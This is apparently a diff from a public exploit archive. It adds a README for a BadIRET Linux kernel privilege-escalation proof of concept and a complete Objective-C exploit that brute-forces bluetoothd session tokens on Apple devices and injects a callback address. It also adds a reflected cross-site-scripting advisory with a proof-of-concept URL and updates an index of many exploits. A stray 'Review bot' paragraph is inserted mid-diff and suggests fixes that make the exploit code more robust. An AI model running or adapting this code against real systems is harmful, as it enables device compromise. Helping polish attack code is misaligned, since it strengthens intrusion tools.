+CVE-2014-9322 (a.k.a BadIRET) proof of concept for Linux kernel.
+This PoC uses only syscalls not any libraries, like pthread. Threads are implemented using raw Linux syscalls.
+[Raw Linux Threads via System Calls](http://nullprogram.com/blog/2015/05/15/)
+
+# Usage
+```
+$ make
+```
+**badiret.elf** is an ELF executable.
+**badiret.bin** is a raw binary that can be used as payload.
+
+# Reference
+[Exploiting “BadIRET” vulnerability (CVE-2014-9322, Linux kernel privilege escalation)](https://blogs.bromium.com/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/)
+
+Download: //github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44205.zip
\ No newline at end of file
diff --git a/exploits/multiple/dos/44215.m b/exploits/multiple/dos/44215.m
new file mode 100644
index 000000000..d83e27333
--- /dev/null
+++ b/exploits/multiple/dos/44215.m
@@ -0,0 +1,222 @@
+//
+// main.m
+// bluetoothdPoC
+//
+// Created by Rani Idan.
+// Copyright © 2018 zLabs. All rights reserved.
+//
+
+
+#import "AppDelegate.h"
+
+#include
+
+extern kern_return_t bootstrap_look_up(mach_port_t bs, const char *service_name, mach_port_t *service);
+
+/* When hijacking session between bluetoothd and client, add callback to the client and jump to CALLBACK_ADDRESS with CALLBACK_ADDITIONAL_DATA */
+#define CALLBACK_ADDRESS 0xdeadbeef
+#define CALLBACK_ADDITIONAL_DATA 0x13371337
+
+#define BLUETOOTHD_CONST 0xFA300
+#define BLUETOOTHD_WRONG_TOKEN 7
+
+#define BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_RECV_SIZE 0x44
+#define BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_SEND_SIZE 0x48
+#define BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_OPTIONS 0x113
+#define BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_MSG_ID 3
+#define BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_TIMEOUT 0x1000
+#define BLUETOOTHD_MIG_SERVER_NAME "com.apple.server.bluetooth"
+
+#define ADD_CALLBACK_MACH_MSG_OUT_RETURN_VALUE_OFFSET 0x20
+#define ADD_CALLBACK_MACH_MSG_IN_SESSION_TOKEN_OFFSET 0x20
+#define ADD_CALLBACK_MACH_MSG_IN_CALLBACK_ADDRESS_OFFSET 0x28
+#define ADD_CALLBACK_MACH_MSG_IN_CALLBACK_DATA 0x40
+
+
+
+typedef unsigned int mach_msg_return_value;
+
+
+mach_port_t get_service_port(char *service_name)
+{
+
+ kern_return_t ret = KERN_SUCCESS;
+ mach_port_t service_port = MACH_PORT_NULL;
+ mach_port_t bs = MACH_PORT_NULL;
+
+
+ ret = task_get_bootstrap_port(mach_task_self(), &bs);
+
+ ret = bootstrap_look_up(bootstrap_port, service_name, &service_port);
+ if (ret)
+ {
+ NSLog(@"Couldn't find port for %s",service_name);
+ return MACH_PORT_NULL;
+ }
+
+ NSLog(@"Got port: %x", service_port);
+
+ mach_port_deallocate(mach_task_self(), bs);
+ return service_port;
+}
+
+
+mach_msg_return_value BTLocalDevice_add_callback(mach_port_t bluetoothd_port, mach_port_t session_token, void* callback_address, long additional_data)
+{
+ mach_port_t receive_port = MACH_PORT_NULL;
+ mach_msg_header_t * message = NULL;
+ char *data = NULL;
+ kern_return_t ret = KERN_SUCCESS;
+
+ mach_msg_return_value return_value = 0;
+
+
+
+ mach_msg_id_t msgh_id = BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_MSG_ID;
+ mach_msg_size_t recv_size = BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_RECV_SIZE;
+ mach_msg_size_t send_size = BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_SEND_SIZE;
+ mach_msg_option_t options = BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_OPTIONS;
+ mach_msg_size_t msg_size = MAX(recv_size, send_size);
+
+
+ ret = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &receive_port);
+ if ( ret != KERN_SUCCESS)
+ {
+ return_value = -3;
+ NSLog(@"Failed to allocate port ret=%x", ret);
+ NSLog(@"mach_error_string: mach_error_string %s", mach_error_string(ret));
+ goto cleanup;
+ }
+ ret = mach_port_insert_right(mach_task_self(), receive_port, receive_port, MACH_MSG_TYPE_MAKE_SEND);
+ if ( ret != KERN_SUCCESS)
+ {
+ return_value = -3;
+ NSLog(@"Failed to insert port right ret=%x", ret);
+ NSLog(@"mach_error_string: mach_error_string %s", mach_error_string(ret));
+ goto cleanup;
+ }
+ message = malloc(msg_size);
+ data = (char *)message;
+
+ memset(message, 0, msg_size);
+
+ *((mach_port_t *)(data+ADD_CALLBACK_MACH_MSG_IN_SESSION_TOKEN_OFFSET)) = session_token;
+ *((void **)(data+ADD_CALLBACK_MACH_MSG_IN_CALLBACK_ADDRESS_OFFSET)) = callback_address;
+ *((long *)(data+ADD_CALLBACK_MACH_MSG_IN_CALLBACK_DATA)) = additional_data;
+
+ message->msgh_bits = 0x1513 ;
+
+ message->msgh_remote_port = bluetoothd_port; /* Request port */
+ message->msgh_local_port = receive_port; /* Reply port */
+ message->msgh_size = send_size; /* Message size */
+ message->msgh_reserved = 0;
+
+
+ message->msgh_id = BLUETOOTHD_CONST + msgh_id;
+
+ ret = mach_msg(message, /* The header */
+ options, /* Flags */
+ send_size, /* Send size */
+ recv_size, /* Max receive Size */
+ receive_port, /* Receive port */
+ BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_TIMEOUT, /* No timeout */
+ MACH_PORT_NULL); /* No notification */
+
+
+ 
if(MACH_MSG_SUCCESS == ret)
+ {
+ return_value = *(mach_msg_return_value *) (((char *) message) + ADD_CALLBACK_MACH_MSG_OUT_RETURN_VALUE_OFFSET);
+ if (return_value != BLUETOOTHD_WRONG_TOKEN) {
+ NSLog(@"Sent message id %d with token %x, returned: %x", msgh_id, session_token, return_value);
+ }
+ } else if (MACH_RCV_INVALID_NAME == ret)
+ {
+ NSLog(@"mach_error_string: mach_error_string %s", mach_error_string(ret));
+ NSLog(@"mach_error_int: ret=%x", ret);
+ NSLog(@"mach_remote_port: %x", message->msgh_remote_port);
+ return_value = -2;
+ }
+ else {
+ NSLog(@"mach_error_string: mach_error_string %s", mach_error_string(ret));
+ NSLog(@"mach_error_int: ret=%x", ret);
+ NSLog(@"mach_remote_port: %x", message->msgh_remote_port);
+ return_value = -1;
+ }
+
+
+cleanup:
+ if(MACH_PORT_NULL != receive_port)
+ {
+ mach_port_destroy(mach_task_self(), receive_port);
+ }
+ if (NULL != message) {
+ free(message);
+ }
+ return return_value;
+}
+
+
+
+void try_to_add_callback_BTLocalDeviceAddCallbacks(void * address, long value)
+{
+ int ports_found[0xffff] = {0};
+ int number_of_ports_found = 0;
+
+ mach_port_t bluetoothd_port = get_service_port(BLUETOOTHD_MIG_SERVER_NAME);
+ if (MACH_PORT_NULL == bluetoothd_port)
+ {
+ NSLog(@"Couldn't have bluetoothd port");
+ return;
+ }
+
+ NSLog(@"Starting to look for session tokens");
+ for (int i = 0; i <= 0xffff; i++) {
+ int id = 0;
+ id = (i << 16) + 1;
+ int result_code = BTLocalDevice_add_callback(bluetoothd_port, id, NULL, 0);
+ if(result_code != BLUETOOTHD_WRONG_TOKEN && result_code != -1)
+ {
+ NSLog(@"Found port: %x", id);
+ ports_found[number_of_ports_found] = id;
+ number_of_ports_found ++;
+ }
+
+
+ id = (i << 16) + 2;
+ result_code = BTLocalDevice_add_callback(bluetoothd_port, id, NULL, 0);
+ if(result_code != BLUETOOTHD_WRONG_TOKEN && result_code != -1)
+ {
+ NSLog(@"Found port: %x", id);
+ ports_found[number_of_ports_found] = id;
+ number_of_ports_found ++;
+ }
+
+
+ id = (i << 16);
+ result_code = 
BTLocalDevice_add_callback(bluetoothd_port, id, NULL, 0);
+ if(result_code != BLUETOOTHD_WRONG_TOKEN && result_code != -1)
+ {
+ NSLog(@"Found port: %x", id);
+ ports_found[number_of_ports_found] = id;
+ number_of_ports_found ++;
+ }
+
+ }
+
+ for (int i = number_of_ports_found-1; i>=0; i--) {
+ NSLog(@"Adding callback: Port=%x address=%x value=%x", ports_found[i], (unsigned int)address, (unsigned int)value);
+ BTLocalDevice_add_callback(bluetoothd_port, ports_found[i],address, value);
+ }
+
+ NSLog(@"Done");
+ return;
+}
+
+void trigger() {
+ try_to_add_callback_BTLocalDeviceAddCallbacks((void *)CALLBACK_ADDRESS, CALLBACK_ADDITIONAL_DATA);
+}
+
+
+int main(int argc, char * argv[]) {
+ trigger();
+}
\ No newline at end of file
diff --git a/exploits/perl/webapps/44216.txt b/exploits/perl/webapps/44216.txt
new file mode 100644
index 000000000..e97e6ddda
--- /dev/null
+++ b/exploits/perl/webapps/44216.txt
@@ -0,0 +1,27 @@
+# Exploit Title: Routers2 2.24 - Reflected Cross-Site Scripting
+# Date: 18-01-18
+# Vendor Homepage: http://www.steveshipway.org/software/
+# Software Link: https://github.com/sshipway/routers2
+# Version: 2.24
+# CVE: CVE-2018-6193
+# Platform: Perl
+# Category: webapps
+# Exploit Author: Lorenzo Di Fuccia
+# Contact: lorenzo.difuccia@gmail.com
+# Website: https://github.com/lorenzodifuccia
+
+1. Description
+
+Routers2 is vulnerable to Reflected Cross-Site Scripting, affecting the 'rtr' GET parameter in a page=graph action to `cgi-bin/routers2.pl`.
+
+2. Proof of Concept
+
+http://router.com/cgi-bin/routers2.pl?rtr=-->&bars=Cami&xgtype=d&page=graph&xgstyle=l2&xmtype=routers
+
+3. Solution
+
+Update the program cloning the repo from GitHub or disable the 'paranoia' setting in the web section of the `routers2.conf`.
+
+4. References
+
+https://github.com/sshipway/routers2/issues/1
\ No newline at end of file
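Review bot: The token scan in try_to_add_callback_BTLocalDeviceAddCallbacks can write past ports_found: the array holds 0xffff entries, the loop runs 0x10000 iterations and may store up to three ids per iteration, and number_of_ports_found is never compared against the array size before any of the three stores. Guard each store, e.g. `if (number_of_ports_found < (int)(sizeof ports_found / sizeof ports_found[0])) { ports_found[number_of_ports_found++] = id; }`, or stop the loop once the table is full. In BTLocalDevice_add_callback the result of `malloc(msg_size)` is handed to memset and written through with no NULL check; a `goto cleanup` with an error return_value would keep that path consistent with the two port-setup failures just above it. The comment `/* No timeout */` on the mach_msg call contradicts the BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_TIMEOUT argument next to it, and in get_service_port the port fetched by task_get_bootstrap_port into bs is never used, since bootstrap_look_up is called with the global bootstrap_port, so that call and its deallocation appear to be leftovers.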
diff --git a/exploits/hardware/local/14727.py b/exploits/windows/local/14727.py
similarity index 100%
rename from exploits/hardware/local/14727.py
rename to exploits/windows/local/14727.py
diff --git a/files_exploits.csv b/files_exploits.csv
index 62e542e7d..0f00d84e9 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5878,6 +5878,10 @@ id,file,description,date,author,type,platform,port
 44183,exploits/linux/dos/44183.py,"Asterisk chan_pjsip 15.2.0 - 'SDP fmtp' Denial of Service",2018-02-27,EnableSecurity,dos,linux,5060
 44184,exploits/linux/dos/44184.py,"Asterisk chan_pjsip 15.2.0 - 'SUBSCRIBE' Stack Corruption",2018-02-27,EnableSecurity,dos,linux,5060
 44189,exploits/windows/dos/44189.py,"Microsoft Windows Windows 8.1/2012 R2 - SMB Denial of Service",2018-02-27,"Nabeel Ahmed",dos,windows,
+44197,exploits/hardware/dos/44197.md,"Sony Playstation 4 (PS4) 5.01 < 5.05 - WebKit Code Execution (PoC)",2018-02-27,ALEXZZZ9,dos,hardware,
+44211,exploits/freebsd_x86-64/dos/44211.c,"FreeBSD Kernel (FreeBSD 10.2 < 10.3 x64) - 'SETFKEY' (PoC)",2016-05-29,CTurt,dos,freebsd_x86-64,
+44212,exploits/freebsd_x86-64/dos/44212.c,"FreeBSD Kernel (FreeBSD 10.2 x64) - 'sendmsg' Kernel Heap Overflow (PoC)",2016-05-29,CTurt,dos,freebsd_x86-64,
+44215,exploits/multiple/dos/44215.m,"Apple iOS 11.2.5 / watchOS 4.2.2 / tvOS 11.2.5 - 'bluetoothd' Memory Corruption",2018-02-28,"Zimperium zLabs Team",dos,multiple,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -7032,7 +7036,7 @@ id,file,description,date,author,type,platform,port
 14503,exploits/windows/local/14503.pl,"HTML Email Creator 2.42 build 718 - Local Buffer Overflow (SEH)",2010-07-29,Madjix,local,windows,
 14527,exploits/windows/local/14527.pl,"WM Downloader 3.1.2.2 - Local Buffer Overflow (1)",2010-08-02,s-dz,local,windows,
 14532,exploits/windows/local/14532.py,"Mini-stream RM-MP3 Converter/WMDownloader/ASX to MP3 Converter - Local Stack Buffer Overflow",2010-08-02,"Praveen Darshanam",local,windows,
-14538,exploits/ios/local/14538.txt,"Apple iOS - '.pdf' Jailbreak",2010-08-03,jailbreakme,local,ios,
+14538,exploits/ios/local/14538.txt,"Apple iOS - '.pdf' Local Privilege Escalation / Jailbreak",2010-08-03,jailbreakme,local,ios,
 14550,exploits/windows/local/14550.py,"Easy RM to MP3 2.7.3.700 - '.m3u' / '.pls' / '.smi' / '.wpl' / '.wax' / '.wvx' / '.ram' Local Overflow",2010-08-04,"Oh Yaw Theng",local,windows,
 14566,exploits/windows/local/14566.c,"Microsoft Windows - 'win32k.sys' Driver 'CreateDIBPalette()' Local Buffer Overflow",2010-08-06,Arkon,local,windows,
 14576,exploits/windows/local/14576.c,"Mini-stream Ripper 3.1.2.1 - Local Buffer Overflow (DEP Bypass)",2010-08-07,"fl0 fl0w",local,windows,
@@ -7054,7 +7058,7 @@ id,file,description,date,author,type,platform,port
 14720,exploits/windows/local/14720.rb,"MicroP 0.1.1.1600 - 'mppl' Local Buffer Overflow",2010-08-23,"James Fitts",local,windows,
 14721,exploits/windows/local/14721.c,"Wireshark 1.2.10 - 'airpcap.dll' DLL Hijacking",2010-08-24,TheLeader,local,windows,
 14723,exploits/windows/local/14723.c,"Microsoft PowerPoint 2010 - 'pptimpconv.dll' DLL Hijacking",2010-08-24,TheLeader,local,windows,
-14727,exploits/hardware/local/14727.py,"Foxit Reader 4.0 - '.pdf' Jailbreak",2010-08-24,"Jose Miguel Esparza",local,hardware,
+14727,exploits/windows/local/14727.py,"Foxit Reader 4.0 - '.pdf' Multiple Stack Based Buffer Overflow / Jailbreak",2010-08-24,"Jose Miguel Esparza",local,windows,
 14726,exploits/windows/local/14726.c,"uTorrent 2.0.3 - 'plugin_dll.dll' DLL Hijacking",2010-08-24,TheLeader,local,windows,
 14728,exploits/windows/local/14728.c,"Microsoft Windows Live Email - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Nicolas Krassas",local,windows,
 14730,exploits/windows/local/14730.c,"Mozilla Firefox 3.6.8 - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Glafkos Charalambous",local,windows,
@@ -8489,7 +8493,7 @@ id,file,description,date,author,type,platform,port
 25703,exploits/solaris/local/25703.txt,"Active News Manager - 'login.asp' SQL Injection",2005-05-25,Romty,local,solaris,
 25707,exploits/linux/local/25707.txt,"Linux Kernel 2.6.x - Cryptoloop Information Disclosure",2005-05-26,"Markku-Juhani O. Saarinen",local,linux,
 25709,exploits/linux/local/25709.sh,"Gentoo Webapp-Config 1.10 - Insecure File Creation",2005-05-26,"Eric Romang",local,linux,
-25718,exploits/hardware/local/25718.txt,"Sony Playstation 3 (PS3) 4.31 - Save Game Preview '.SFO' File Handling Local Command Execution",2013-05-26,Vulnerability-Lab,local,hardware,
+25718,exploits/hardware/local/25718.txt,"Sony Playstation 3 (PS3) 4.31 - Save Game Preview '.SFO' Handling Local Command Execution",2013-05-26,Vulnerability-Lab,local,hardware,
 25725,exploits/windows/local/25725.rb,"AdobeCollabSync - Local Buffer Overflow / Adobe Reader X Sandbox Bypass (Metasploit)",2013-05-26,Metasploit,local,windows,
 40392,exploits/linux/local/40392.py,"EKG Gadu 1.9~pre+r2855-3+b1 - Local Buffer Overflow",2016-09-19,"Juan Sacco",local,linux,
 25789,exploits/linux/local/25789.c,"FUSE 2.2/2.3 - Local Information Disclosure",2005-06-06,"Miklos Szeredi",local,linux,
@@ -9330,7 +9334,7 @@ id,file,description,date,author,type,platform,port
 43359,exploits/linux/local/43359.c,"Firejail < 0.9.44.4 / < 0.9.38.8 LTS - Local Sandbox Escape",2017-01-04,"Sebastian Krahmer",local,linux,
 43366,exploits/windows/local/43366.md,"TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change",2017-12-04,gellin,local,windows,
 43390,exploits/windows/local/43390.txt,"Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation",2017-12-26,"Julien Ahrens",local,windows,
-43397,exploits/bsd/local/43397.md,"Sony Playstation 4 4.05 FW - Local Kernel Loader",2017-12-27,Specter,local,bsd,
+43397,exploits/hardware/local/43397.md,"Sony Playstation 4 (PS4) 4.05 - Jailbreak (WebKit / 'namedobj ' Kernel Loader)",2017-12-27,Specter,local,hardware,
 43418,exploits/linux/local/43418.c,"Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP)",2017-08-13,"Andrey Konovalov",local,linux,
 43421,exploits/windows/local/43421.py,"Kingsoft Antivirus/Internet Security 9+ - Local Privilege Escalation",2018-01-03,mr_me,local,windows,
 43427,exploits/multiple/local/43427.c,"Multiple CPUs - 'Spectre' Information Disclosure",2018-01-03,Multiple,local,multiple,
@@ -9543,7 +9547,14 @@ id,file,description,date,author,type,platform,port
 44167,exploits/windows_x86/local/44167.c,"NoMachine < 6.0.80 (x86) - 'nxfuse' Privilege Escalation",2018-02-22,"Fidus InfoSecurity",local,windows_x86,
 44168,exploits/windows_x86-64/local/44168.py,"NoMachine < 6.0.80 (x64) - 'nxfuse' Privilege Escalation",2018-02-22,"Fidus InfoSecurity",local,windows_x86-64,
 44169,exploits/windows/local/44169.txt,"Armadito Antivirus 0.12.7.2 - Detection Bypass",2018-02-22,"Souhail Hammou",local,windows,
-44177,exploits/bsd/local/44177.c,"Sony Playstation 4 4.55 FW - Local Kernel",2018-02-26,qwertyoruiop,local,bsd,
+44177,exploits/hardware/local/44177.c,"Sony Playstation 4 (PS4) 4.07 < 4.55 - 'bpf' Local Kernel Code Execution (PoC)",2018-02-26,qwertyoruiop,local,hardware,
+44198,exploits/hardware/local/44198.md,"Sony Playstation 4 (PS4) 3.50 < 4.07 - WebKit Code Execution (PoC)",2017-04-08,Specter,local,hardware,
+44199,exploits/hardware/local/44199.md,"Sony Playstation 4 (PS4) 3.15 < 3.55 - WebKit Code Execution (PoC)",2016-09-06,"TJ Corley",local,hardware,
+44200,exploits/hardware/local/44200.md,"Sony Playstation 3 (PS3) < 2.50 - WebKit Code Execution (PoC)",2016-04-21,"TJ Corley",local,hardware,
+44204,exploits/linux/local/44204.md,"WebKitGTK 2.1.2 (Ubuntu 14.04) - Heap based Buffer Overflow",2017-08-19,"Ren Kimura",local,linux,
+44205,exploits/linux/local/44205.md,"Linux Kernel - 'BadIRET' Local Privilege Escalation",2017-07-24,"Ren Kimura",local,linux,
+44206,exploits/hardware/local/44206.c,"Sony Playstation 4 (PS4) 1.76 - 'dlclose' Linux Loader",2016-04-27,"Carlos Pizarro",local,hardware,
+44213,exploits/hardware/local/44213.html,"Nintendo Switch - WebKit Code Execution (PoC)",2017-03-12,LiveOverflow,local,hardware,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -10355,7 +10366,7 @@ id,file,description,date,author,type,platform,port
 4488,exploits/windows/remote/4488.html,"Pegasus Imaging ImagXpress 8.0 - Arbitrary File Overwrite",2007-10-05,shinnai,remote,windows,
 4506,exploits/windows/remote/4506.html,"Microsoft Visual FoxPro 6.0 - 'FPOLE.OCX' Arbitrary Command Execution",2007-10-09,shinnai,remote,windows,
 4514,exploits/linux/remote/4514.c,"Eggdrop Server Module Message Handling - Remote Buffer Overflow",2007-10-10,bangus/magnum,remote,linux,
-4522,exploits/hardware/remote/4522.html,"Apple iTouch/iPhone 1.1.1 - '.tif' File Remote Jailbreak",2007-10-11,"Niacin & Dre",remote,hardware,
+4522,exploits/ios/remote/4522.html,"Apple iTouch/iPhone 1.1.1 - '.tif' Remote Privilege Escalation / Jailbreak",2007-10-11,"Niacin & Dre",remote,ios,
 4526,exploits/windows/remote/4526.html,"PBEmail 7 - ActiveX Edition Insecure Method",2007-10-12,Katatafish,remote,windows,
 4530,exploits/multiple/remote/4530.pl,"Apache Tomcat - 'WebDAV' Remote File Disclosure",2007-10-14,eliteboy,remote,multiple,
 4533,exploits/linux/remote/4533.c,"eXtremail 2.1.1 - 'LOGIN' Remote Stack Overflow",2007-10-15,mu-b,remote,linux,4501
@@ -16265,6 +16276,7 @@ id,file,description,date,author,type,platform,port
 44175,exploits/windows/remote/44175.rb,"CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit)",2018-02-26,Metasploit,remote,windows,8888
 44176,exploits/hardware/remote/44176.rb,"AsusWRT LAN - Unauthenticated Remote Code Execution (Metasploit)",2018-02-26,Metasploit,remote,hardware,9999
 44187,exploits/windows/remote/44187.py,"GetGo Download Manager 5.3.0.2712 - Buffer Overflow (SEH)",2018-02-27,bzyo,remote,windows,
+44196,exploits/hardware/remote/44196.md,"Sony Playstation 4 (PS4) 4.55 - Jailbreak (WebKit 5.01 / 'bpf' Kernel Loader 4.55)",2018-02-27,Specter,remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -38121,7 +38133,7 @@ id,file,description,date,author,type,platform,port
 44071,exploits/windows/webapps/44071.md,"IDERA Uptime Monitor 7.8 - Multiple Vulnerabilities",2017-06-08,SecuriTeam,webapps,windows,
 44072,exploits/hardware/webapps/44072.md,"Geneko Routers - Unauthenticated Path Traversal",2017-07-16,SecuriTeam,webapps,hardware,
 44074,exploits/hardware/webapps/44074.md,"Dasan Networks GPON ONT WiFi Router H640X 12.02-01121 / 2.77p1-1124 / 3.03p2-1146 - Unauthenticated Remote Code Execution",2017-12-06,SecuriTeam,webapps,hardware,
-44098,exploits/asp/webapps/44098.txt,"EPIC MyChart - SQL Injection",2018-02-16,"Shayan S",webapps,asp,443
+44098,exploits/asp/webapps/44098.txt,"EPIC MyChart - X-Path Injection",2018-02-16,"Shayan S",webapps,asp,443
 44100,exploits/php/webapps/44100.txt,"TV - Video Subscription - Authentication Bypass SQL Injection",2018-02-16,L0RD,webapps,php,80
 44101,exploits/php/webapps/44101.py,"UserSpice 4.3 - Blind SQL Injection",2018-02-16,"Dolev Farhi",webapps,php,80
 44102,exploits/php/webapps/44102.txt,"Twig < 2.4.4 - Server Side Template Injection",2018-02-16,JameelNabbo,webapps,php,80
@@ -38924,3 +38936,4 @@ id,file,description,date,author,type,platform,port
 44191,exploits/php/webapps/44191.txt,"School Management Script 3.0.4 - Authentication Bypass",2018-02-27,"Samiran Santra",webapps,php,
 44192,exploits/php/webapps/44192.txt,"CMS Made Simple 2.1.6 - Remote Code Execution",2018-02-27,"Keerati T.",webapps,php,
 44194,exploits/php/webapps/44194.py,"Concrete5 < 8.3.0 - Username / Comments Enumeration",2018-02-27,"Chapman Schleiss",webapps,php,
+44216,exploits/perl/webapps/44216.txt,"Routers2 2.24 - Cross-Site Scripting",2018-02-28,"Lorenzo Di Fuccia",webapps,perl,